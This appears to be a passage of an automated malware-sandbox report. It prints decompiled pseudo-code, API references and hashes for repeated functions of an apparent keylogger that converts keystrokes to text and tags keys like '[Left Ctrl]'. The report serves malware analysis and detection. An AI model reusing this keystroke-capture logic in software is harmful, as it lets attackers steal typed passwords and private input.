                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Mail]
                  • API String ID: 783433895-2576540148
                  • Opcode ID: 894362c06f24928aebacecf1c1ea633ebd1172f8d8f33313dcf1344a25e01b1e
                  • Instruction ID: fbc98f99418ed78a52aeb1d89c1fb141902b9a4107213f6ffe6694a7e55c15de
                  • Opcode Fuzzy Hash: 894362c06f24928aebacecf1c1ea633ebd1172f8d8f33313dcf1344a25e01b1e
                  • Instruction Fuzzy Hash: BC31C2B8F042545BF722C7658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45C761
                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007574(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Media]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  Instruction addresses for the statements in the listing above, in listing order:
                  0x10007574, 0x10007574, 0x1000757b, 0x100076f0, 0x100076f5, 0x10007727, 0x10007727, 0x10007731,
                  0x10007759, 0x1000775d, 0x1000780e, 0x10007810, 0x10007816, 0x1000781f, 0x10007836, 0x10007838,
                  0x10007839, 0x10007845, 0x1000784e, 0x10007853, 0x10007855, 0x10007857, 0x10007879, 0x10007880,
                  0x10007880, 0x10007857, 0x10007855, 0x10007763, 0x10007774, 0x10007776, 0x1000777b, 0x10007780,
                  0x1000778f, 0x10007794, 0x10007798, 0x100077be, 0x100077cb, 0x1000779a, 0x100077a2, 0x100077af,
                  0x100077af, 0x10007798, 0x100077d0, 0x100077d6, 0x100077d8, 0x100077f8, 0x100077f8, 0x10007807,
                  0x10007807, 0x1000788b, 0x10007890, 0x10007894, 0x10007894, 0x1000789b, 0x1000789e, 0x100078a1,
                  0x100078b6

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Media]
                  • API String ID: 783433895-256090921
                  • Opcode ID: 1e0823390995c0d7b20590a1ed7fc42133228cec3a3e15fac83785cecb6d023e
                  • Instruction ID: 1d6d8283b16d110cfc78ae97d037f546bcd25651ecbbde41830c0a0e15c384cb
                  • Opcode Fuzzy Hash: 1e0823390995c0d7b20590a1ed7fc42133228cec3a3e15fac83785cecb6d023e
                  • Instruction Fuzzy Hash: AE31C2B8F042545BF722C7658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45C761
                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007585(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Left Ctrl]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  Instruction addresses for the statements in the listing above, in listing order:
                  0x10007585, 0x10007585, 0x1000758c, 0x100076f0, 0x100076f5, 0x10007727, 0x10007727, 0x10007731,
                  0x10007759, 0x1000775d, 0x1000780e, 0x10007810, 0x10007816, 0x1000781f, 0x10007836, 0x10007838,
                  0x10007839, 0x10007845, 0x1000784e, 0x10007853, 0x10007855, 0x10007857, 0x10007879, 0x10007880,
                  0x10007880, 0x10007857, 0x10007855, 0x10007763, 0x10007774, 0x10007776, 0x1000777b, 0x10007780,
                  0x1000778f, 0x10007794, 0x10007798, 0x100077be, 0x100077cb, 0x1000779a, 0x100077a2, 0x100077af,
                  0x100077af, 0x10007798, 0x100077d0, 0x100077d6, 0x100077d8, 0x100077f8, 0x100077f8, 0x10007807,
                  0x10007807, 0x1000788b, 0x10007890, 0x10007894, 0x10007894, 0x1000789b, 0x1000789e, 0x100078a1,
                  0x100078b6

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Left Ctrl]
                  • API String ID: 783433895-3005955766
                  • Opcode ID: 6e196f45300483c3a4ae03fa75a33ab96228d6b58ef24f6c2d519915bf58e4fe
                  • Instruction ID: 28846d815b0a88ec7f80af092469e54f7a14a72bd487e43e72f76064ef582a80
                  • Opcode Fuzzy Hash: 6e196f45300483c3a4ae03fa75a33ab96228d6b58ef24f6c2d519915bf58e4fe
                  • Instruction Fuzzy Hash: E731BEB8F042545BF722CB658C45B9F73A9FB882C0F50C0A6B5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007596(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Arrow Left]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                  • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Arrow Left]
                  • API String ID: 783433895-1177434692
                  • Opcode ID: 5da1957fa9e9ca11a06898b52d5d6c0a4425c8685ea52a547f580b048b1913c6
                  • Instruction ID: 960f23aa8f43220be064e63a19ba5b46ed73888c7d640a2a7c440eaac0204f03
                  • Opcode Fuzzy Hash: 5da1957fa9e9ca11a06898b52d5d6c0a4425c8685ea52a547f580b048b1913c6
                  • Instruction Fuzzy Hash: 5A31C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A6F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E100075A7(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Left Alt]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                  • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Left Alt]
                  • API String ID: 783433895-4254496124
                  • Opcode ID: 2cec1b9318e2d2c86633c5b15370c804d0d016b88f7532adb9ff4300fb6f5750
                  • Instruction ID: 3f3db3c1f6d446afdc82a05f0a05d26ced4366bb5cd4d0252c92c5b85f9850ca
                  • Opcode Fuzzy Hash: 2cec1b9318e2d2c86633c5b15370c804d0d016b88f7532adb9ff4300fb6f5750
                  • Instruction Fuzzy Hash: DA31B0B8B042545BF722C7658C45B9F73A9FB882C0F50C0A5B5489720ECA78EE458761
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E100075B8(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Next Track]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                  • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Next Track]
                  • API String ID: 783433895-2289579739
                  • Opcode ID: 4bb0c2166a23f48689fc7f19d14cbfaf811bbbb3efc322fb13dea8c573a2909b
                  • Instruction ID: d5362d4f7291d6c897a022562f4ff387a401af9e6337d31ccc62730f376386c9
                  • Opcode Fuzzy Hash: 4bb0c2166a23f48689fc7f19d14cbfaf811bbbb3efc322fb13dea8c573a2909b
                  • Instruction Fuzzy Hash: 8731C0B8F042545BF722DB658C45B9F73A9FB882C0F50C0A6F5489724ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E100075C9(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Play / Pause]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
